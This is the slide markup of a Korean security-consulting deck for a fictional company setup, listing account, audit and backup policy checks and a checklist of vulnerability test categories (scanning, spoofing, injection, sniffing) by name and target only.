          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="585488" y="215326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네트워크구성도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712112" y="151970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조직도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97" y="1526409"/>
            <a:ext cx="325148" cy="32514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40" y="2169025"/>
            <a:ext cx="325148" cy="3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00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1411217"/>
            <a:ext cx="2292439" cy="523112"/>
            <a:chOff x="0" y="1483787"/>
            <a:chExt cx="2292439" cy="523112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="직사각형 3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  <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="직사각형 4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712112" y="151970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보안요구사항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712112" y="2155619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보안취약점</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean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점검항목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12112" y="2910752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보안취약점</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean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점검일정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47" y="3040565"/>
            <a:ext cx="325148" cy="32514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34" y="2285432"/>
            <a:ext cx="325148" cy="325148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74" y="1510199"/>
            <a:ext cx="325148" cy="325148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2499681" y="79459"/>
            <a:ext cx="30059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보안취약점 점검</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="30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762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2172648"/>
            <a:ext cx="2292439" cy="523112"/>
            <a:chOff x="0" y="1483787"/>
            <a:chExt cx="2292439" cy="523112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="직사각형 3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  <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="직사각형 4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712112" y="151970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보안요구사항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712112" y="2155619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보안취약점</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean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점검항목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12112" y="2910752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보안취약점</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean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점검일정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2499681" y="79459"/>
            <a:ext cx="30059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보안취약점 점검</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="30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47" y="3040565"/>
            <a:ext cx="325148" cy="32514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34" y="2285432"/>
            <a:ext cx="325148" cy="325148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74" y="1510199"/>
            <a:ext cx="325148" cy="3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440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2910752"/>
            <a:ext cx="2292439" cy="523112"/>
            <a:chOff x="0" y="1483787"/>
            <a:chExt cx="2292439" cy="523112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="직사각형 3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  <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="직사각형 4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714420" y="1524701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보안요구사항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712112" y="2155619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보안취약점</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean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점검항목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12112" y="2910752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보안취약점</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean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점검일정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47" y="3040565"/>
            <a:ext cx="325148" cy="32514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34" y="2285432"/>
            <a:ext cx="325148" cy="325148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74" y="1510199"/>
            <a:ext cx="325148" cy="325148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2499681" y="79459"/>
            <a:ext cx="30059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보안취약점 점검</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="30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2377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-1" y="0"/>
            <a:ext cx="2292439" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1B2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 userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2311984" y="0"/>
            <a:ext cx="9899562" cy="7083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254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28075"/>
            <a:ext cx="619602" cy="58026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364" y="6132635"/>
            <a:ext cx="619602" cy="580263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737216" y="233540"/>
            <a:ext cx="1574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DejaVu Sans Mono" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Smile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" baseline="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DejaVu Sans Mono" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Gate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DejaVu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259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74" r:id="rId5"/>
    <p:sldLayoutId id="2147483673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653" r:id="rId14"/>
    <p:sldLayoutId id="2147483654" r:id="rId15"/>
    <p:sldLayoutId id="2147483655" r:id="rId16"/>
    <p:sldLayoutId id="2147483656" r:id="rId17"/>
    <p:sldLayoutId id="2147483657" r:id="rId18"/>
    <p:sldLayoutId id="2147483658" r:id="rId19"/>
    <p:sldLayoutId id="2147483660" r:id="rId20"/>
    <p:sldLayoutId id="2147483694" r:id="rId2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나눔바른고딕 Light" panose="020B0603020101020101" pitchFamily="50" charset="-127"/>
          <a:ea typeface="나눔바른고딕 Light" panose="020B060302010102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059AC-5A6F-46E8-AFC4-5BFAE7C08DF2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A311E-49C6-4F39-8892-249C0EB57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479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4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4" y="63563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012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4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4" y="63563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100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slide" Target="slide4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7.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide4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자주색, 꽃, 분홍색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91C8C12E-1D50-437A-BEAD-20476CF7E9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1" t="9091" r="28705" b="-2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4818888" y="1"/>
            <a:ext cx="7373112" cy="6857999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="Freeform 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{9225B0D8-E56E-4ACC-A464-81F4062765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851" y="-478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50" name="Freeform 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{8F5D1B28-3976-4367-807C-CAD629CDD83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852" y="-478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88586" y="2549029"/>
            <a:ext cx="6542955" cy="3320973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4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="DejaVu Sans Mono" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="DejaVu Sans Mono" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>가상 회사 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="DejaVu Sans Mono" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="DejaVu Sans Mono" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>보안</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg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ko-KR" altLang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="DejaVu Sans Mono" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="DejaVu Sans Mono" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>컨설팅</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg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/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg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</a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg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/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg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</a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg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- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg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SmileGate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg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/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg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</a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg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Entertainment</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="4400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="DejaVu Sans Mono" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="DejaVu Sans Mono" panose="020B0609030804020204" pitchFamily="49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8586" y="2008503"/>
            <a:ext cx="4167376" cy="440744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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg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조 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="46357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내용 개체 틀 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7ECEE965-CE1C-437F-8101-7628A7CF1B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1553516"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2723384" y="1405238"/>
          <a:ext cx="8683722" cy="4801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6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0408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3016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점검 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점검 대상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59001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계정</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> 정책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암호 정책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암호 복잡성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최근 암호 기억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최대 암호 사용기간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최소 암호 길이</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/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전체 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
                        <a:t>PC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534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계정 잠금 정책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계정 잠금 기간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계정 잠금 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
                        <a:t>임계값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임계값</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
                        <a:t> 초기화 시간</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/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010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관리자</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" baseline="0" dirty="0"/>
                        <a:t> 계정 설정</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" baseline="0" dirty="0"/>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" baseline="0" dirty="0"/>
                        <a:t>계정 사용 여부 및 이름 변경 여부</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" baseline="0" dirty="0"/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2813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aseline="0" dirty="0"/>
                        <a:t>게스트 계정 설정</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" baseline="0" dirty="0"/>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" baseline="0" dirty="0"/>
                        <a:t>계정 사용 여부 및 이름 변경 여부</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" baseline="0" dirty="0"/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96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익명 사용자 권한 확인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614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원격 접속용 계정 구분 여부 확인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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
                        <a:t>PC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614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감사 정책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개체 액세스 감사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계정 로그온 이벤트 감사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614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백신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설치 및 최신 패치 업데이트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전체 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
                        <a:t>PC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009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백업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백업 일정 설정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전체 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
                        <a:t>PC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897204" y="924026"/>
            <a:ext cx="246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PC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>사용 현황 파악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934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내용 개체 틀 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B626B74E-8388-45E0-8DF3-9718CC9207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3708329"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2762378" y="1908207"/>
          <a:ext cx="8710936" cy="4136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81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23673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86838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17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보안 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점검 대상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1705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시스템 보안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Host</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" baseline="0" dirty="0"/>
                        <a:t> Scanning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내부 부서 네트워크 및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외부 접속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1705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Port Scanning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내부 부서 네트워크 및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외부 접속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705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Null</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" baseline="0" dirty="0"/>
                        <a:t> Session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윈도우 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
                        <a:t>OS </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
                        <a:t>서버</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
                        <a:t>(VPN, CA)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1705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웹 보안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PUT, Delete Method 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웹 서버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1705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Sniffing(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
                        <a:t>Sesssion</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" baseline="0" dirty="0"/>
                        <a:t> Hijacking)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1705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Banner</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" baseline="0" dirty="0"/>
                        <a:t> Grabbing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1705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Directory</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" baseline="0" dirty="0"/>
                        <a:t> listing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762378" y="1193533"/>
            <a:ext cx="263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보안점검 체크리스트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360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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{068EE261-2A48-485B-9F57-3A2FBB58BC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3840566"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2679763" y="1347537"/>
          <a:ext cx="8812712" cy="47325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58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363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40051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76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보안 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점검 대상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692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웹 보안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ID/PW</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" baseline="0" dirty="0"/>
                        <a:t> Brute Forcing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웹 서버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692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XSS(Session Hijacking)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692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CSRF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74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DB </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
                        <a:t>보안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SQL Injection(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
                        <a:t>인증 우회</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
                        <a:t>, Blind</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" baseline="0" dirty="0"/>
                        <a:t> Injection, Mass Injection, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" baseline="0" dirty="0"/>
                        <a:t>저장 프로시저</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" baseline="0" dirty="0"/>
                        <a:t>) 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웹 서버</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
                        <a:t>, DB </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
                        <a:t>서버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5692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네트워크 보안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ARP Spoofing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각 부서</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" baseline="0" dirty="0"/>
                        <a:t> 및 서버 네트워크 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" baseline="0" dirty="0"/>
                        <a:t>PC, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" baseline="0" dirty="0"/>
                        <a:t>스위치 및 라우터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5692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IP Spoofing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5692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DHCP Spoofing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999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DHCP Starvation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각 부서</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" baseline="0" dirty="0"/>
                        <a:t> 및 서버 네트워크 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" baseline="0" dirty="0"/>
                        <a:t>PC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679763" y="875899"/>
            <a:ext cx="263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보안점검체크리스트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142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20116" y="1126155"/>
            <a:ext cx="263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보안점검체크리스트 </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="내용 개체 틀 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{821C6486-18D2-4612-BC33-0F4923A9A9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2475306"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2620116" y="1785074"/>
          <a:ext cx="8901324" cy="41825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51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37970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70644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683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보안 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점검 대상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10893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네트워크 보안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dirty="0"/>
                        <a:t>DNS Spoofing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각 부서</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" baseline="0" dirty="0"/>
                        <a:t> 및 서버 네트워크 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" baseline="0" dirty="0"/>
                        <a:t>PC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271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dirty="0"/>
                        <a:t>ICMP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" baseline="0" dirty="0"/>
                        <a:t> redirection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각 부서</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" baseline="0" dirty="0"/>
                        <a:t> 및 서버 네트워크 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" baseline="0" dirty="0"/>
                        <a:t>PC,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/>
                        <a:t>스위치 및 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" baseline="0" dirty="0" err="1"/>
                        <a:t>라우터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271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dirty="0"/>
                        <a:t>SSH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취약점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리눅스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OS </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
                        <a:t>서버</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
                        <a:t>(DNS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
                        <a:t>서버</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
                        <a:t>, DHCP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
                        <a:t>서버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웹</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" baseline="0" dirty="0"/>
                        <a:t> 서버</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" baseline="0" dirty="0"/>
                        <a:t>, DB </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" baseline="0" dirty="0"/>
                        <a:t>서버</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" baseline="0" dirty="0"/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108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dirty="0"/>
                        <a:t>SSL </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
                        <a:t>취약점</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR"/>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
                        <a:t>SSL </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
                        <a:t>Strip</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" baseline="0" dirty="0"/>
                        <a:t> Attack)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각 부서</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" baseline="0" dirty="0"/>
                        <a:t> 및 서버 네트워크 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" baseline="0" dirty="0"/>
                        <a:t>PC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271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dirty="0"/>
                        <a:t>SNMP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
                        <a:t>취약점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각 부서</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" baseline="0" dirty="0"/>
                        <a:t> 및 서버 네트워크 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" baseline="0" dirty="0"/>
                        <a:t>PC,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/>
                        <a:t>스위치 및 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" baseline="0" dirty="0" err="1"/>
                        <a:t>라우터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108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dirty="0"/>
                        <a:t>VPN Sniffing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VPN </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
                        <a:t>네트워크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602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302" y="1809549"/>
            <a:ext cx="9029700" cy="362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4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888" y="1116957"/>
            <a:ext cx="8235533" cy="53486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05485" y="2037606"/>
            <a:ext cx="731118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계정정책 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>암호 정책 및 계정 잠금 정책</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>]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계정정책 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>계정설정</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>]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감사정책 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>개체 액세스 및 이벤트 감사</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>]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백업 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>일정 </a:t>
            </a:r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설명 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>및 확인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웹 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>서버 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>SSL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>설정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03578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69736" y="81915"/>
            <a:ext cx="916188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계정정책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 [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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암호 정책 및 계정 잠금 정책</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US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4" name="그림 2" descr="https://lh6.googleusercontent.com/I7hapM_E5_x7j1vWZRfhrGhRDnqhZJoRBkTKPwplH_8wR0wlevKc5U87M6D437pXUitaRybJNLuUwQ8BFoiKBX9HhqHIyN2q68i-yFOU8L_UQE7n2V2JZCBOP_hRy-3SFOBVYh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572" y="2171000"/>
            <a:ext cx="3961305" cy="208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3" descr="https://lh4.googleusercontent.com/Hg6vLIepMSQFn5U_oh0fXB7s6WVjiA67on_aEuehjXGwE5ZWOWa-PrqMTAYctEJrQO0e89lWlDaXM8r54UimntdPn6d7o5TG_xT6I3OKOjeNG1kazZYGZc-rcjmSDbEUZBmB5Rl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034" y="2569850"/>
            <a:ext cx="4516138" cy="135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959450" y="4633819"/>
            <a:ext cx="8716722" cy="1080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kern="1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암호</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="2000" kern="1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복잡성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정책만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사용</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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최근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암호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기억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설정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없음</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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최대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암호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사용기간</a:t>
            </a:r>
